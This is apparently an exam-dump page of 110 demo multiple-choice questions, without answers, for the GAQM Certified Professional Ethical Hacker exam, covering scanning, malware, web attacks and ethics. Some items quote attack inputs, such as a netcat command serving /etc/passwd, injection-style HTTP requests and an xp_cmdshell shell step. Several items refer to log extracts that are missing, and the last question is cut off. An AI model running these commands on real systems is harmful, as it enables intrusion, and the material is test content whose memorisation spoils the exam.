New Year Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 70percent

GAQM CPEH-001 Certified Professional Ethical Hacker (CPEH) Exam Practice Test

Demo: 110 questions
Total 736 questions

Certified Professional Ethical Hacker (CPEH) Questions and Answers

Question 1

An attacker with access to the inside network of a small company launches a successful STP manipulation attack. What will he do next?

Options:

A.

He will create a SPAN entry on the spoofed root bridge and redirect traffic to his computer.

B.

He will activate OSPF on the spoofed root bridge.

C.

He will repeat the same attack against all L2 switches of the network.

D.

He will repeat this action so that it escalates to a DoS attack.

Question 2

Websites and web portals that provide web services commonly use the Simple Object Access Protocol SOAP. Which of the following is an incorrect definition or characteristics in the protocol?

Options:

A.

Based on XML

B.

Provides a structured model for messaging

C.

Exchanges data between web services

D.

Only compatible with the application protocol HTTP

Question 3

An attacker gains access to a Web server's database and displays the contents of the table that holds all of the names, passwords, and other user information. The attacker did this by entering information into the Web site's user login page that the software's designers did not expect to be entered. This is an example of what kind of software design problem?

Options:

A.

Insufficient input validation

B.

Insufficient exception handling

C.

Insufficient database hardening

D.

Insufficient security management

Question 4

Which of the following programming languages is most susceptible to buffer overflow attacks, due to its lack of a built-in-bounds checking mechanism?

Output:

Segmentation fault

Options:

A.

C#

B.

Python

C.

Java

D.

C++

Question 5

In both pharming and phishing attacks an attacker can create websites that look similar to legitimate sites with the intent of collecting personal identifiable information from its victims. What is the difference between pharming and phishing attacks?

Options:

A.

In a pharming attack a victim is redirected to a fake website by modifying their host configuration file or by exploiting vulnerabilities in DNS. In a phishing attack an attacker provides the victim with a URL that is either misspelled or looks similar to the actual websites domain name.

B.

Both pharming and phishing attacks are purely technical and are not considered forms of social engineering.

C.

Both pharming and phishing attacks are identical.

D.

In a phishing attack a victim is redirected to a fake website by modifying their host configuration file or by exploiting vulnerabilities in DNS. In a pharming attack an attacker provides the victim with a URL that is either misspelled or looks very similar to the actual websites domain name.

Question 6

You work as a Security Analyst for a retail organization. In securing the company's network, you set up a firewall and an IDS. However, hackers are able to attack the network. After investigating, you discover that your IDS is not configured properly and therefore is unable to trigger alarms when needed. What type of alert is the IDS giving?

Options:

A.

False Negative

B.

False Positive

C.

True Negative

D.

True Positive

Question 7

A hacker has managed to gain access to a Linux host and stolen the password file from /etc/passwd. How can he use it?

Options:

A.

The password file does not contain the passwords themselves.

B.

He can open it and read the user ids and corresponding passwords.

C.

The file reveals the passwords to the root user only.

D.

He cannot read it because it is encrypted.

Question 8

What is the role of test automation in security testing?

Options:

A.

It can accelerate benchmark tests and repeat them with a consistent test setup. But it cannot replace manual testing completely.

B.

It is an option but it tends to be very expensive.

C.

It should be used exclusively. Manual testing is outdated because of low speed and possible test setup inconsistencies.

D.

Test automation is not usable in security due to the complexity of the tests.

Question 9

An Internet Service Provider (ISP) has a need to authenticate users connecting using analog modems, Digital Subscriber Lines (DSL), wireless data services, and Virtual Private Networks (VPN) over a Frame Relay network.

Which AAA protocol is most likely able to handle this requirement?

Options:

A.

RADIUS

B.

DIAMETER

C.

Kerberos

D.

TACACS+

Question 10

A well-intentioned researcher discovers a vulnerability on the web site of a major corporation. What should he do?

Options:

A.

Ignore it.

B.

Try to sell the information to a well-paying party on the dark web.

C.

Notify the web site owner so that corrective action be taken as soon as possible to patch the vulnerability.

D.

Exploit the vulnerability without harming the web site owner so that attention be drawn to the problem.

Question 11

In cryptanalysis and computer security, 'pass the hash' is a hacking technique that allows an attacker to authenticate to a remote server/service by using the underlying NTLM and/or LanMan hash of a user's password, instead of requiring the associated plaintext password as is normally the case.

Metasploit Framework has a module for this technique: psexec. The psexec module is often used by penetration testers to obtain access to a given system that you already know the credentials for. It was written by sysinternals and has been integrated within the framework. Often as penetration testers, successfully gain access to a system through some exploit, use meterpreter to grab the passwords or other methods like fgdump, pwdump, or cachedump and then utilize rainbowtables to crack those hash values.

Which of the following is true hash type and sort order that is using in the psexec module's 'smbpass'?

Options:

A.

NT:LM

B.

LM:NT

C.

LM:NTLM

D.

NTLM:LM

Question 12

An attacker is using nmap to do a ping sweep and a port scanning in a subnet of 254 addresses.

In which order should he perform these steps?

Options:

A.

The sequence does not matter. Both steps have to be performed against all hosts.

B.

First the port scan to identify interesting services and then the ping sweep to find hosts responding to icmp echo requests.

C.

First the ping sweep to identify live hosts and then the port scan on the live hosts. This way he saves time.

D.

The port scan alone is adequate. This way he saves time.

Question 13

What network security concept requires multiple layers of security controls to be placed throughout an IT infrastructure, which improves the security posture of an organization to defend against malicious attacks or potential vulnerabilities?

Options:

A.

Security through obscurity

B.

Host-Based Intrusion Detection System

C.

Defense in depth

D.

Network-Based Intrusion Detection System

Question 14

Bob learned that his username and password for a popular game has been compromised. He contacts the company and resets all the information. The company suggests he use two-factor authentication, which option below offers that?

Options:

A.

A new username and password

B.

A fingerprint scanner and his username and password.

C.

Disable his username and use just a fingerprint scanner.

D.

His username and a stronger password.

Question 15

What mechanism in Windows prevents a user from accidentally executing a potentially malicious batch (.bat) or PowerShell (.ps1) script?

Options:

A.

User Access Control (UAC)

B.

Data Execution Prevention (DEP)

C.

Address Space Layout Randomization (ASLR)

D.

Windows firewall

Question 16

Which of the following is considered an exploit framework and has the ability to perform automated attacks on services, ports, applications and unpatched security flaws in a computer system?

Options:

A.

Wireshark

B.

Maltego

C.

Metasploit

D.

Nessus

Question 17

What is the minimum number of network connections in a multi homed firewall?

Options:

A.

3

B.

5

C.

4

D.

2

Question 18

Which of the following DoS tools is used to attack target web applications by starvation of available sessions on the web server?

The tool keeps sessions at halt using never-ending POST transmissions and sending an arbitrarily large content-length header value.

Options:

A.

My Doom

B.

Astacheldraht

C.

R-U-Dead-Yet?(RUDY)

D.

LOIC

Question 19

Security Policy is a definition of what it means to be secure for a system, organization or other entity. For Information Technologies, there are sub-policies like Computer Security Policy, Information Protection Policy, Information Security Policy, network Security Policy, Physical Security Policy, Remote Access Policy, and User Account Policy.

What is the main theme of the sub-policies for Information Technologies?

Options:

A.

Availability, Non-repudiation, Confidentiality

B.

Authenticity, Integrity, Non-repudiation

C.

Confidentiality, Integrity, Availability

D.

Authenticity, Confidentiality, Integrity

Question 20

Assume a business-crucial web-site of some company that is used to sell handsets to the customers worldwide. All the developed components are reviewed by the security team on a monthly basis. In order to drive business further, the web-site developers decided to add some 3rd party marketing tools on it. The tools are written in JavaScript and can track the customer’s activity on the site. These tools are located on the servers of the marketing company.

What is the main security risk associated with this scenario?

Options:

A.

External script contents could be maliciously modified without the security team knowledge

B.

External scripts have direct access to the company servers and can steal the data from there

C.

There is no risk at all as the marketing services are trustworthy

D.

External scripts increase the outbound company data traffic which leads greater financial losses

Question 21

Log monitoring tools performing behavioral analysis have alerted several suspicious logins on a Linux server occurring during non-business hours. After further examination of all login activities, it is noticed that none of the logins have occurred during typical work hours. A Linux administrator who is investigating this problem realizes the system time on the Linux server is wrong by more than twelve hours. What protocol used on Linux servers to synchronize the time has stopped working?

Options:

A.

Time Keeper

B.

NTP

C.

PPP

D.

OSPP

Question 22

You perform a scan of your company’s network and discover that TCP port 123 is open. What services by default run on TCP port 123?

Options:

A.

Telnet

B.

POP3

C.

Network Time Protocol

D.

DNS

Question 23

Which of the following is considered as one of the most reliable forms of TCP scanning?

Options:

A.

TCP Connect/Full Open Scan

B.

Half-open Scan

C.

NULL Scan

D.

Xmas Scan

Question 24

On performing a risk assessment, you need to determine the potential impacts when some of the critical business process of the company interrupt its service. What is the name of the process by which you can determine those critical business?

Options:

A.

Risk Mitigation

B.

Emergency Plan Response (EPR)

C.

Disaster Recovery Planning (DRP)

D.

Business Impact Analysis (BIA)

Question 25

Insecure direct object reference is a type of vulnerability where the application does not verify if the user is authorized to access the internal object via its name or key.

Suppose a malicious user Rob tries to get access to the account of a benign user Ned.

Which of the following requests best illustrates an attempt to exploit an insecure direct object reference vulnerability?

Options:

A.

“GET/restricted/goldtransfer?to=Rob&from=1 or 1=1’ HTTP/1.1Host: westbank.com”

B.

“GET/restricted/accounts/?name=Ned HTTP/1.1 Host: westbank.com”

C.

“GET/restricted/bank.getaccount(‘Ned’) HTTP/1.1 Host: westbank.com”

D.

“GET/restricted/\r\n\%00account%00Ned%00access HTTP/1.1 Host: westbank.com”

Question 26

Which of the following attacks exploits web age vulnerabilities that allow an attacker to force an unsuspecting user’s browser to send malicious requests they did not intend?

Options:

A.

Command Injection Attacks

B.

File Injection Attack

C.

Cross-Site Request Forgery (CSRF)

D.

Hidden Field Manipulation Attack

Question 27

In Wireshark, the packet bytes panes show the data of the current packet in which format?

Options:

A.

Decimal

B.

ASCII only

C.

Binary

D.

Hexadecimal

Question 28

Alice encrypts her data using her public key PK and stores the encrypted data in the cloud. Which of the following attack scenarios will compromise the privacy of her data?

Options:

A.

None of these scenarios compromise the privacy of Alice’s data

B.

Agent Andrew subpoenas Alice, forcing her to reveal her private key. However, the cloud server successfully resists Andrew’s attempt to access the stored data

C.

Hacker Harry breaks into the cloud server and steals the encrypted data

D.

Alice also stores her private key in the cloud, and Harry breaks into the cloud server as before

Question 29

Why containers are less secure that virtual machines?

Options:

A.

Host OS on containers has a larger surface attack.

B.

Containers may full fill disk space of the host.

C.

A compromise container may cause a CPU starvation of the host.

D.

Containers are attached to the same virtual network.

Question 30

Some clients of TPNQM SA were redirected to a malicious site when they tried to access the TPNQM main site. Bob, a system administrator at TPNQM SA, found that they were victims of DNS Cache Poisoning.

What should Bob recommend to deal with such a threat?

Options:

A.

The use of security agents in clients’ computers

B.

The use of DNSSEC

C.

The use of double-factor authentication

D.

Client awareness

Question 31

You need a tool that can do network intrusion prevention and intrusion detection, function as a network sniffer, and record network activity, what tool would you most likely select?

Options:

A.

Nmap

B.

Cain & Abel

C.

Nessus

D.

Snort

Question 32

Trinity needs to scan all hosts on a /16 network for TCP port 445 only. What is the fastest way she can accomplish this with Nmap? Stealth is not a concern.

Options:

A.

nmap -sn -sF 10.1.0.0/16 445

B.

nmap -p 445 -n -T4 –open 10.1.0.0/16

C.

nmap -s 445 -sU -T5 10.1.0.0/16

D.

nmap -p 445 –max -Pn 10.1.0.0/16

Question 33

Which of the following are well known password-cracking programs?

Options:

A.

L0phtcrack

B.

NetCat

C.

Jack the Ripper

D.

Netbus

E.

John the Ripper

Question 34

You are trying to break into a highly classified top-secret mainframe computer with highest security system in place at Merclyn Barley Bank located in Los Angeles.

You know that conventional hacking doesn't work in this case, because organizations such as banks are generally tight and secure when it comes to protecting their systems.

In other words, you are trying to penetrate an otherwise impenetrable system.

How would you proceed?

Options:

A.

Look for "zero-day" exploits at various underground hacker websites in Russia and China and buy the necessary exploits from these hackers and target the bank's network

B.

Try to hang around the local pubs or restaurants near the bank, get talking to a poorly-paid or disgruntled employee, and offer them money if they'll abuse their access privileges by providing you with sensitive information

C.

Launch DDOS attacks against Merclyn Barley Bank's routers and firewall systems using 100, 000 or more "zombies" and "bots"

D.

Try to conduct Man-in-the-Middle (MiTM) attack and divert the network traffic going to the Merclyn Barley Bank's Webserver to that of your machine using DNS Cache Poisoning techniques

Question 35

Which definition among those given below best describes a covert channel?

Options:

A.

A server program using a port that is not well known.

B.

Making use of a protocol in a way it is not intended to be used.

C.

It is the multiplexing taking place on a communication link.

D.

It is one of the weak channels used by WEP which makes it insecure

Question 36

As a securing consultant, what are some of the things you would recommend to a company to ensure DNS security?

Options:

A.

Use the same machines for DNS and other applications

B.

Harden DNS servers

C.

Use split-horizon operation for DNS servers

D.

Restrict Zone transfers

E.

Have subnet diversity between DNS servers

Question 37

An LDAP directory can be used to store information similar to a SQL database. LDAP uses a _____ database structure instead of SQL’s _____ structure. Because of this, LDAP has difficulty representing many-to-one relationships.

Options:

A.

Relational, Hierarchical

B.

Strict, Abstract

C.

Hierarchical, Relational

D.

Simple, Complex

Question 38

What does the following command in netcat do?

nc -l -u -p55555 < /etc/passwd

Options:

A.

logs the incoming connections to /etc/passwd file

B.

loads the /etc/passwd file to the UDP port 55555

C.

grabs the /etc/passwd file when connected to UDP port 55555

D.

deletes the /etc/passwd file when connected to the UDP port 55555

Question 39

Study the snort rule given below and interpret the rule. alert tcp any any --> 192.168.1.0/24 111

(content:"|00 01 86 a5|"; msG. "mountd access";)

Options:

A.

An alert is generated when a TCP packet is generated from any IP on the 192.168.1.0 subnet and destined to any IP on port 111

B.

An alert is generated when any packet other than a TCP packet is seen on the network and destined for the 192.168.1.0 subnet

C.

An alert is generated when a TCP packet is originated from port 111 of any IP address to the 192.168.1.0 subnet

D.

An alert is generated when a TCP packet originating from any IP address is seen on the network and destined for any IP address on the 192.168.1.0 subnet on port 111

Question 40

What is the purpose of DNS AAAA record?

Options:

A.

Authorization, Authentication and Auditing record

B.

Address prefix record

C.

Address database record

D.

IPv6 address resolution record

Question 41

You have the SOA presented below in your Zone.

Your secondary servers have not been able to contact your primary server to synchronize information. How long will the secondary servers attempt to contact the primary server before it considers that zone is dead and stops responding to queries?

collegae.edu.SOA, cikkye.edu ipad.college.edu. (200302028 3600 3600 604800 3600)

Options:

A.

One day

B.

One hour

C.

One week

D.

One month

Question 42

One of your team members has asked you to analyze the following SOA record.

What is the TTL? Rutgers.edu.SOA NS1.Rutgers.edu ipad.college.edu (200302028 3600 3600 604800 2400.)

Options:

A.

200303028

B.

3600

C.

604800

D.

2400

E.

60

F.

4800

Question 43

Which of the following tools are used for enumeration? (Choose three.)

Options:

A.

SolarWinds

B.

USER2SID

C.

Cheops

D.

SID2USER

E.

DumpSec

Question 44

Based on the following extract from the log of a compromised machine, what is the hacker really trying to steal?

Options:

A.

har.txt

B.

SAM file

C.

wwwroot

D.

Repair file

Question 45

This is an attack that takes advantage of a web site vulnerability in which the site displays content that includes un-sanitized user-provided data.

What is this attack?

Options:

A.

Cross-site-scripting attack

B.

SQL Injection

C.

URL Traversal attack

D.

Buffer Overflow attack

Question 46

How does a denial-of-service attack work?

Options:

A.

A hacker prevents a legitimate user (or group of users) from accessing a service

B.

A hacker uses every character, word, or letter he or she can think of to defeat authentication

C.

A hacker tries to decipher a password by using a system, which subsequently crashes the network

D.

A hacker attempts to imitate a legitimate user by confusing a computer or even another person

Question 47

Fred is the network administrator for his company. Fred is testing an internal switch.

From an external IP address, Fred wants to try and trick this switch into thinking it already has established a session with his computer. How can Fred accomplish this?

Options:

A.

Fred can accomplish this by sending an IP packet with the RST/SIN bit and the source address of his computer.

B.

He can send an IP packet with the SYN bit and the source address of his computer.

C.

Fred can send an IP packet with the ACK bit set to zero and the source address of the switch.

D.

Fred can send an IP packet to the switch with the ACK bit and the source address of his machine.

Question 48

Study the following log extract and identify the attack.

Options:

A.

Hexcode Attack

B.

Cross Site Scripting

C.

Multiple Domain Traversal Attack

D.

Unicode Directory Traversal Attack

Question 49

Which of the following tools would MOST LIKELY be used to perform security audit on various of forms of network systems?

Options:

A.

Intrusion Detection System

B.

Vulnerability scanner

C.

Port scanner

D.

Protocol analyzer

Question 50

Matthew received an email with an attachment named “YouWon$10Grand.zip.” The zip file contains a file named “HowToClaimYourPrize.docx.exe.” Out of excitement and curiosity, Matthew opened the said file. Without his knowledge, the file copies itself to Matthew’s APPDATA\IocaI directory and begins to beacon to a Command-and-control server to download additional malicious binaries. What type of malware has Matthew encountered?

Options:

A.

Key-logger

B.

Trojan

C.

Worm

D.

Macro Virus

Question 51

Which of the following commands runs snort in packet logger mode?

Options:

A.

./snort -dev -h ./log

B.

./snort -dev -l ./log

C.

./snort -dev -o ./log

D.

./snort -dev -p ./log

Question 52

Which of the following is the BEST approach to prevent Cross-site Scripting (XSS) flaws?

Options:

A.

Use digital certificates to authenticate a server prior to sending data.

B.

Verify access right before allowing access to protected information and UI controls.

C.

Verify access right before allowing access to protected information and UI controls.

D.

Validate and escape all information sent to a server.

Question 53

A distributed port scan operates by:

Options:

A.

Blocking access to the scanning clients by the targeted host

B.

Using denial-of-service software against a range of TCP ports

C.

Blocking access to the targeted host by each of the distributed scanning clients

D.

Having multiple computers each scan a small number of ports, then correlating the results

Question 54

Which access control mechanism allows for multiple systems to use a central authentication server (CAS) that permits users to authenticate once and gain access to multiple systems?

Options:

A.

Role Based Access Control (RBAC)

B.

Discretionary Access Control (DAC)

C.

Windows authentication

D.

Single sign-on

Question 55

While doing a technical assessment to determine network vulnerabilities, you used the TCP XMAS scan. What would be the response of all open ports?

Options:

A.

The port will send an ACK

B.

The port will send a SYN

C.

The port will ignore the packets

D.

The port will send an RST

Question 56

Which of the following Nmap commands would be used to perform a stack fingerprinting?

Options:

A.

Nmap -O -p80

B.

Nmap -hU -Q

C.

Nmap -sT -p

D.

Nmap -u -o -w2

E.

Nmap -sS -0p targe

Question 57

Which of the following is a vulnerability in GNU’s bash shell (discovered in September of 2014) that gives attackers access to run remote commands on a vulnerable system?

Options:

A.

Shellshock

B.

Rootshell

C.

Rootshock

D.

Shellbash

Question 58

What would you type on the Windows command line in order to launch the Computer Management Console provided that you are logged in as an admin?

Options:

A.

c:\compmgmt.msc

B.

c:\gpedit

C.

c:\ncpa.cpl

D.

c:\services.msc

Question 59

If you are to determine the attack surface of an organization, which of the following is the BEST thing to do?

Options:

A.

Running a network scan to detect network services in the corporate DMZ

B.

Reviewing the need for a security clearance for each employee

C.

Using configuration management to determine when and where to apply security patches

D.

Training employees on the security policy regarding social engineering

Question 60

While reviewing the result of scanning run against a target network you come across the following:

Which among the following can be used to get this output?

Options:

A.

A Bo2k system query.

B.

nmap protocol scan

C.

A sniffer

D.

An SNMP walk

Question 61

Which of the following security policies defines the use of VPN for gaining access to an internal corporate network?

Options:

A.

Network security policy

B.

Remote access policy

C.

Information protection policy

D.

Access control policy

Question 62

A new wireless client that is 802.11 compliant cannot connect to a wireless network given that the client can see the network and it has compatible hardware and software installed. Upon further tests and investigation, it was found out that the Wireless Access Point (WAP) was not responding to the association requests being sent by the wireless client. What MOST likely is the issue on this scenario?

Options:

A.

The client cannot see the SSID of the wireless network

B.

The WAP does not recognize the client’s MAC address.

C.

The wireless client is not configured to use DHCP.

D.

Client is configured for the wrong channel

Question 63

A hacker was able to easily gain access to a website. He was able to log in via the frontend user login form of the website using default or commonly used credentials. This exploitation is an example of what Software design flaw?

Options:

A.

Insufficient security management

B.

Insufficient database hardening

C.

Insufficient input validation

D.

Insufficient exception handling

Question 64

An nmap command that includes the host specification of 202.176.56-57.* will scan _______ number of hosts.

Options:

A.

2

B.

256

C.

512

D.

Over 10, 000

Question 65

What is the benefit of performing an unannounced Penetration Testing?

Options:

A.

The tester will have an actual security posture visibility of the target network.

B.

Network security would be in a "best state" posture.

C.

It is best to catch critical infrastructure unpatched.

D.

The tester could not provide an honest analysis.

Question 66

You are tasked to perform a penetration test. While you are performing information gathering, you find an employee list in Google. You find the receptionist's email, and you send her an email changing the source email to her boss's email( boss@company ). In this email, you ask for a pdf with information. She reads your email and sends back a pdf with links. You exchange the pdf links with your malicious links (these links contain malware) and send back the modified pdf, saying that the links don't work. She reads your email, opens the links, and her machine gets infected. You now have access to the company network.

What testing method did you use?

Options:

A.

Social engineering

B.

Tailgating

C.

Piggybacking

D.

Eavesdropping

Question 67

The Open Web Application Security Project (OWASP) is the worldwide not-for-profit charitable organization focused on improving the security of software. What item is the primary concern on OWASP's Top Ten Project Most Critical Web Application Security Risks?

Options:

A.

Injection

B.

Cross Site Scripting

C.

Cross Site Request Forgery

D.

Path disclosure

Question 68

When you are testing a web application, it is very useful to employ a proxy tool to save every request and response. You can manually test every request and analyze the response to find vulnerabilities. You can test parameter and headers manually to get more precise results than if using web vulnerability scanners.

What proxy tool will help you find web vulnerabilities?

Options:

A.

Burpsuite

B.

Maskgen

C.

Dimitry

D.

Proxychains

Question 69

Initiating an attack against targeted businesses and organizations, threat actors compromise a carefully selected website by inserting an exploit resulting in malware infection. The attackers run exploits on well-known and trusted sites likely to be visited by their targeted victims. Aside from carefully choosing sites to compromise, these attacks are known to incorporate zero-day exploits that target unpatched vulnerabilities. Thus, the targeted entities are left with little or no defense against these exploits.

What type of attack is outlined in the scenario?

Options:

A.

Watering Hole Attack

B.

Heartbleed Attack

C.

Shellshock Attack

D.

Spear Phising Attack

Question 70

Which of the following is a design pattern based on distinct pieces of software providing application functionality as services to other applications?

Options:

A.

Service Oriented Architecture

B.

Object Oriented Architecture

C.

Lean Coding

D.

Agile Process

Question 71

You are performing information gathering for an important penetration test. You have found pdf, doc, and images in your objective. You decide to extract metadata from these files and analyze it.

What tool will help you with the task?

Options:

A.

Metagoofil

B.

Armitage

C.

Dimitry

D.

cdpsnarf

Question 72

When you are getting information about a web server, it is very important to know the HTTP Methods (GET, POST, HEAD, PUT, DELETE, TRACE) that are available because there are two critical methods (PUT and DELETE). PUT can upload a file to the server and DELETE can delete a file from the server. You can detect all these methods (GET, POST, HEAD, PUT, DELETE, TRACE) using NMAP script engine.

What nmap script will help you with this task?

Options:

A.

http-methods

B.

http enum

C.

http-headers

D.

http-git

Question 73

> NMAP -sn 192.168.11.200-215

The NMAP command above performs which of the following?

Options:

A.

A ping scan

B.

A trace sweep

C.

An operating system detect

D.

A port scan

Question 74

It is a regulation that has a set of guidelines, which should be adhered to by anyone who handles any electronic medical data. These guidelines stipulate that all medical practices must ensure that all necessary measures are in place while saving, accessing, and sharing any electronic medical data to keep patient data secure.

Which of the following regulations best matches the description?

Options:

A.

HIPAA

B.

ISO/IEC 27002

C.

COBIT

D.

FISMA

Question 75

Which of the following is the successor of SSL?

Options:

A.

TLS

B.

RSA

C.

GRE

D.

IPSec

Question 76

This phase will increase the odds of success in later phases of the penetration test. It is also the very first step in Information Gathering, and it will tell you what the "landscape" looks like.

What is the most important phase of ethical hacking in which you need to spend a considerable amount of time?

Options:

A.

footprinting

B.

network mapping

C.

gaining access

D.

escalating privileges

Question 77

Jesse receives an email with an attachment labeled “Court_Notice_21206.zip”. Inside the zip file is a file named “Court_Notice_21206.docx.exe” disguised as a word document. Upon execution, a window appears stating, “This word document is corrupt.” In the background, the file copies itself to Jesse APPDATA\local directory and begins to beacon to a C2 server to download additional malicious binaries.

What type of malware has Jesse encountered?

Options:

A.

Trojan

B.

Worm

C.

Macro Virus

D.

Key-Logger

Question 78

What is a "Collision attack" in cryptography?

Options:

A.

Collision attacks try to find two inputs producing the same hash.

B.

Collision attacks try to break the hash into two parts, with the same bytes in each part to get the private key.

C.

Collision attacks try to get the public key.

D.

Collision attacks try to break the hash into three parts to get the plaintext value.

Question 79

It is an entity or event with the potential to adversely impact a system through unauthorized access, destruction, disclosure, denial of service or modification of data.

Which of the following terms best matches the definition?

Options:

A.

Threat

B.

Attack

C.

Vulnerability

D.

Risk

Question 80

You've just been hired to perform a pen test on an organization that has been subjected to a large-scale attack. The CIO is concerned with mitigating threats and vulnerabilities to totally eliminate risk.

What is one of the first things you should do when given the job?

Options:

A.

Explain to the CIO that you cannot eliminate all risk, but you will be able to reduce risk to acceptable levels.

B.

Interview all employees in the company to rule out possible insider threats.

C.

Establish attribution to suspected attackers.

D.

Start the wireshark application to start sniffing network traffic.

Question 81

Which of the following items is unique to the N-tier architecture method of designing software applications?

Options:

A.

Application layers can be separated, allowing each layer to be upgraded independently from other layers.

B.

It is compatible with various databases including Access, Oracle, and SQL.

C.

Data security is tied into each layer and must be updated for all layers when any upgrade is performed.

D.

Application layers can be written in C, ASP.NET, or Delphi without any performance loss.

Question 82

Which of the following algorithms provides better protection against brute force attacks by using a 160-bit message digest?

Options:

A.

MD5

B.

SHA-1

C.

RC4

D.

MD4

Question 83

Advanced encryption standard is an algorithm used for which of the following?

Options:

A.

Data integrity

B.

Key discovery

C.

Bulk data encryption

D.

Key recovery

Question 84

A certified ethical hacker (CEH) completed a penetration test of the main headquarters of a company almost two months ago, but has yet to get paid. The customer is suffering from financial problems, and the CEH is worried that the company will go out of business and end up not paying. What actions should the CEH take?

Options:

A.

Threaten to publish the penetration test results if not paid.

B.

Follow proper legal procedures against the company to request payment.

C.

Tell other customers of the financial problems with payments from this company.

D.

Exploit some of the vulnerabilities found on the company webserver to deface it.

Question 85

The intrusion detection system at a software development company suddenly generates multiple alerts regarding attacks against the company's external webserver, VPN concentrator, and DNS servers. What should the security team do to determine which alerts to check first?

Options:

A.

Investigate based on the maintenance schedule of the affected systems.

B.

Investigate based on the service level agreements of the systems.

C.

Investigate based on the potential effect of the incident.

D.

Investigate based on the order that the alerts arrived in.

Question 86

Which NMAP feature can a tester implement or adjust while scanning for open ports to avoid detection by the network’s IDS?

Options:

A.

Timing options to slow the speed that the port scan is conducted

B.

Fingerprinting to identify which operating systems are running on the network

C.

ICMP ping sweep to determine which hosts on the network are not available

D.

Traceroute to control the path of the packets sent during the scan

Question 87

Which of the following is an example of IP spoofing?

Options:

A.

SQL injections

B.

Man-in-the-middle

C.

Cross-site scripting

D.

ARP poisoning

Question 88

Which of the following processes of PKI (Public Key Infrastructure) ensures that a trust relationship exists and that a certificate is still valid for specific operations?

Options:

A.

Certificate issuance

B.

Certificate validation

C.

Certificate cryptography

D.

Certificate revocation

Question 89

The Open Web Application Security Project (OWASP) testing methodology addresses the need to secure web applications by providing which one of the following services?

Options:

A.

An extensible security framework named COBIT

B.

A list of flaws and how to fix them

C.

Web application patches

D.

A security certification for hardened web applications

Question 90

When comparing the testing methodologies of Open Web Application Security Project (OWASP) and Open Source Security Testing Methodology Manual (OSSTMM) the main difference is

Options:

A.

OWASP is for web applications and OSSTMM does not include web applications.

B.

OSSTMM is gray box testing and OWASP is black box testing.

C.

OWASP addresses controls and OSSTMM does not.

D.

OSSTMM addresses controls and OWASP does not.

Question 91

A technician is resolving an issue where a computer is unable to connect to the Internet using a wireless access point. The computer is able to transfer files locally to other machines, but cannot successfully reach the Internet. When the technician examines the IP address and default gateway they are both on the 192.168.1.0/24. Which of the following has occurred?

Options:

A.

The gateway is not routing to a public IP address.

B.

The computer is using an invalid IP address.

C.

The gateway and the computer are not on the same network.

D.

The computer is not using a private IP address.

Question 92

Which of the following can take an arbitrary length of input and produce a message digest output of 160 bit?

Options:

A.

SHA-1

B.

MD5

C.

HAVAL

D.

MD4

Question 93

A consultant has been hired by the V.P. of a large financial organization to assess the company's security posture. During the security testing, the consultant comes across child pornography on the V.P.'s computer. What is the consultant's obligation to the financial organization?

Options:

A.

Say nothing and continue with the security testing.

B.

Stop work immediately and contact the authorities.

C.

Delete the pornography, say nothing, and continue security testing.

D.

Bring the discovery to the financial organization's human resource department.

Question 94

Which of the following guidelines or standards is associated with the credit card industry?

Options:

A.

Control Objectives for Information and Related Technology (COBIT)

B.

Sarbanes-Oxley Act (SOX)

C.

Health Insurance Portability and Accountability Act (HIPAA)

D.

Payment Card Industry Data Security Standards (PCI DSS)

Question 95

Which of the following descriptions is true about a static NAT?

Options:

A.

A static NAT uses a many-to-many mapping.

B.

A static NAT uses a one-to-many mapping.

C.

A static NAT uses a many-to-one mapping.

D.

A static NAT uses a one-to-one mapping.

Question 96

Which of the following is an advantage of utilizing security testing methodologies to conduct a security audit?

Options:

A.

They provide a repeatable framework.

B.

Anyone can run the command line scripts.

C.

They are available at low cost.

D.

They are subject to government regulation.

Question 97

One way to defeat a multi-level security solution is to leak data via

Options:

A.

a bypass regulator.

B.

steganography.

C.

a covert channel.

D.

asymmetric routing.

Question 98

Which tool can be used to silently copy files from USB devices?

Options:

A.

USB Grabber

B.

USB Dumper

C.

USB Sniffer

D.

USB Snoopy

Question 99

How can rainbow tables be defeated?

Options:

A.

Password salting

B.

Use of non-dictionary words

C.

All uppercase character passwords

D.

Lockout accounts under brute force password cracking attempts

Question 100

During a penetration test, a tester finds a target that is running MS SQL 2000 with default credentials. The tester assumes that the service is running with Local System account. How can this weakness be exploited to access the system?

Options:

A.

Using the Metasploit psexec module setting the SA / Admin credential

B.

Invoking the stored procedure xp_shell to spawn a Windows command shell

C.

Invoking the stored procedure cmd_shell to spawn a Windows command shell

D.

Invoking the stored procedure xp_cmdshell to spawn a Windows command shell

Question 101

At a Windows Server command prompt, which command could be used to list the running services?

Options:

A.

Sc query type= running

B.

Sc query \\servername

C.

Sc query

D.

Sc config

Question 102

A security policy will be more accepted by employees if it is consistent and has the support of

Options:

A.

coworkers.

B.

executive management.

C.

the security officer.

D.

a supervisor.

Question 103

Which of the following lists are valid data-gathering activities associated with a risk assessment?

Options:

A.

Threat identification, vulnerability identification, control analysis

B.

Threat identification, response identification, mitigation identification

C.

Attack profile, defense profile, loss profile

D.

System profile, vulnerability identification, security determination

Question 104

How can a rootkit bypass Windows 7 operating system’s kernel mode, code signing policy?

Options:

A.

Defeating the scanner from detecting any code change at the kernel

B.

Replacing patch system calls with its own version that hides the rootkit (attacker's) actions

C.

Performing common services for the application process and replacing real applications with fake ones

D.

Attaching itself to the master boot record in a hard drive and changing the machine's boot sequence/options

Question 105

Which of the following is a symmetric cryptographic standard?

Options:

A.

DSA

B.

PKI

C.

RSA

D.

3DES

Question 106

Which tool is used to automate SQL injections and exploit a database by forcing a given web application to connect to another database controlled by a hacker?

Options:

A.

DataThief

B.

NetCat

C.

Cain and Abel

D.

SQLInjector

Question 107

What results will the following command yield: 'NMAP -sS -O -p 123-153 192.168.100.3'?

Options:

A.

A stealth scan, opening port 123 and 153

B.

A stealth scan, checking open ports 123 to 153

C.

A stealth scan, checking all open ports excluding ports 123 to 153

D.

A stealth scan, determine operating system, and scanning ports 123 to 153

Question 108

A hacker is attempting to see which ports have been left open on a network. Which NMAP switch would the hacker use?

Options:

A.

-sO

B.

-sP

C.

-sS

D.

-sU

Question 109

A recently hired network security associate at a local bank was given the responsibility to perform daily scans of the internal network to look for unauthorized devices. The employee decides to write a script that will scan the network for unauthorized devices every morning at 5:00 am.

Which of the following programming languages would most likely be used?

Options:

A.

PHP

B.

C#

C.

Python

D.

ASP.NET

Question 110

What technique is used to perform a Connection Stream Parameter Pollution (CSPP) attack?

Options:

A.

Injecting parameters into a connection string using semicolons as a separator

B.

